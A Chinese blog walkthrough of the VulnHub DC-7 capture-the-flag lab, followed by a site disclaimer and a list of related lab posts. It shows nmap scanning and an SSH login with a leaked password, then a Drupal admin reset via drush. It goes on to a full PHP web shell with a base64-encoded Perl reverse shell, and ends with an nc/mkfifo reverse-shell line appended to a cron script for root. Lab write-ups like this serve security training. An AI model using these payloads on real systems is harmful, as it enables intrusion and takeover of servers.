靶场练习第十五天~vulnhub靶场之dc-7

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:https://download.vulnhub.com/dc/DC-7.zip

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A -p- 192.168.101.120

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

(2)发现在欢迎页面的左下角有一个“@DC7USER”,应该是接入点,然后百度搜索@DC7USER,发现一些网站代码

(3)点击config.php发现用户名密码

(4)使用ssh尝试远程登录

ssh dc7user@192.168.101.120

yes

MdR3xOgB7#dW

(5)查看dc7user用户有哪些文件,看看有没有可以利用的信息

dc7user@dc-7:~$ ls

backups mbox

dc7user@dc-7:~$ cd backups/

dc7user@dc-7:~/backups$ ls

website.sql.gpg website.tar.gz.gpg

dc7user@dc-7:~/backups$ cd ..

dc7user@dc-7:~$ cat mbox

在mbox文件里面发现一个可以利用的脚本

(6)进入到/opt/scripts查看backups.sh文件

cd /opt/scripts

cat backups.sh

(7)发现该脚本涉及drush命令,进入到html目录下,使用drush命令修改网页的用户密码

drush user-password admin --password="123456"

使用修改的用户密码登录

登录成功

三、漏洞利用

1.添加getshell

(1)在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

(2)在Manage—>EXtend里面下载模块

模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

我已经下载好了,就不演示了

2.提权

我添加php反向连接代码

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

kali开启监听

nc -lvvp 4444

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c 'import pty;pty.spawn("/bin/bash")'

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

写入反弹shell代码到backups.sh脚本文件中,并在kali监听1234端口,等待计划任务执行,稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.101.10 1234 >/tmp/f" >>backups.sh

cat backups.sh

nc -lvvp 1234

大概15分钟, 文件自动执行完成

查看当前用户,进入root目录查看theflag.txt

id

cd /root

cat theflag.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375039.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

靶场练习第十六天~vulnhub靶场之dc-8

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&…

【SpringMVC】SpringMVC系列4之@RequestParam 映射请求参数值

4、RequestParam 映射请求参数值 4.1、概述 Spring MVC 通过分析处理方法的签名&#xff0c;将 HTTP 请求信息绑定到处理方法的相应人参中。Spring MVC 对控制器处理方法签名的限制是很宽松的&#xff0c;几乎可以按喜欢的任何方式对方法进行签名。必要时可以对方法及方法入…

Sprint3

进展&#xff1a;今天主要是各自熟悉安卓应用开发平台&#xff0c;设计了图标&#xff0c;没什么实际上的进展。 燃尽图&#xff1a; 团队工作照&#xff1a; 转载于:https://www.cnblogs.com/XJXYJ/p/4495810.html

靶场练习第十七天~vulnhub靶场之dc-9

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&am…

Linux内核分析 02

二&#xff0c;操作系统是如何工作的 1、函数调用堆栈 三大法宝&#xff1a;存储程序计算机 函数调用堆栈 中断机制 堆栈&#xff1a;是C语言程序运行时必须的一个记录调用路径和参数的空间。是计算机内部现成的东西&#xff0c;我们直接使用。 包括函数调用框架、传递参数、保…

靶场练习第十八天~vulnhub靶场之hackableII

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开…

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

一、环境搭建 靶官网机下载地址&#xff1a;Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP&#xff0c;因为kali和靶机都是NAT模式下&#xff0c;所以用 nmap 192.168…

spring mvc 多线程并发

ThreadLocal为解决多线程程序的并发问题提供了一种新的思路。使用这个工具类可以很简洁地编写出优美的多线程程序。 http://www.xuebuyuan.com/1628190.html 我们知道Spring通过各种DAO模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的&#xff0c;也就…

靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开…

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虚拟内存统计&#xff09;的缩写&#xff0c;可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计&#xff0c;不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏&#xff0c;一方面很好奇这些游戏是怎么做出来的&#xff0c;另一方面觉得有些地方设计的不合理&#xff0c;希望电脑游戏既能让人玩的有趣&#xff0c;又不浪费时间。 学校五年&#xff0c;毕业十年&#xff0c;学用了十多种…

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip&#xff1a;nmap 192.168.101.0/24 2.端口扫描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;发现开放2…

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;寻找隐藏的网站 gobuster di…

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出&#xff1a;非聚集索引的B树结构在聚集表里&#xff0c;在聚集表里&#xff0c;我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列&#xff0c;SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机…

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…

【知识积累】DES算法之C#加密Java解密

一、前言 在项目需要添加安全模块&#xff0c;客户端调用服务端发布的service必须要经过验证&#xff0c;加密算法采用DES&#xff0c;客户端采用C#进行加密&#xff0c;服务端使用Java进行解密。废话不多说&#xff0c;直接上代码。 二、客户端 客户端采用C#进行开发&#xff…

Space.js – HTML 驱动的页面 3D 滚动效果

为了让我们的信息能够有效地沟通&#xff0c;我们需要创建用户和我们的媒体之间的强有力的联系。今天我们就来探讨在网络上呈现故事的新方法&#xff0c;并为此创造了一个开源和免费使用的 JavaScript 库称为 space.js。该库是 HTML 驱动的&#xff0c;这意味着你不需要在网站上…

离职感言-Symbio的5年工作回顾和总结(转载)

离职感言-Symbio的5年工作回顾和总结 (2011-06-02 21:06:30) 转载▼2005年底&#xff0c;当时我在西安过的还不错&#xff0c;结了婚&#xff0c;买了房&#xff0c;在公司也受老板器重&#xff0c;但是初为人父&#xff0c;孩子带给我的那种人生紧迫感&#xff1a;“再不趁还…